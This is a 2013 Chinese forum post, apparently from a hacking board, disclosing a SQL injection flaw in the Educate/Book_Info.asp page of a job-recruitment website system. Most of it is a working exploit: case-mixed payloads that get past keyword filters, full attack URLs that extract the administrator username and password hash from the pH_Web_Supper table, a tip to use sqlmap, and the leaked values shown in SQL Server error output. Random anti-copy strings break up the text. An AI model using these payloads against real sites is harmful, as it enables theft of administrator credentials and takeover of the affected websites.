标题: 网络求职招聘人才网站系统正式版注入 [打印本页] 作者: admin 时间: 2013-2-16 21:44 标题: 网络求职招聘人才网站系统正式版注入 漏洞出现在Educate/Book_Info.asp ) A, R" s5 Z; D. I9 ?, F
0 \0 U0 ]9 i7 H' ^此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出 - Y6 }# x7 D0 E6 x- A9 j' h 2 @, q) L- f: T: texp:如下; ^) l5 E) A" L; Y
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)$ m/ B1 }9 d% ?3 z) u
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)7 H1 w" C. T0 g: H+ m" L
- U- G" Q- P. D9 W \9 X3 x0 ohttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)- B' r$ k2 K& J3 v- s& D
" [7 [) ^6 \2 c7 A
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'+ w" S% X1 \+ y: L/ v! N
1 N/ W$ E( m) K# E" E* B将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。 3 R/ C& i5 \. S7 f) k x : W( d4 K f* T* }, e* ]- ~. e
/Educate/Book_Info.asp,行 8: ~9 ]9 `& e! I8 G, S d( K8 L
" s3 Q2 H* S+ k; m+ ]+ }http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper) 8 M/ S6 Q" M6 a 6 Y. G3 T& w2 Z% D+ E2 QMicrosoft OLE DB Provider for SQL Server 错误 '80040e07' $ ]+ h3 q7 {6 O( W! m5 s 4 s# f+ l* Y- p* f& G' c
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。 * a: d3 c1 K* Q1 O3 Y. e! B 1 A. u% I& T6 J+ z
/Educate/Book_Info.asp,行 86 l9 s: H2 _8 ~; f) W! k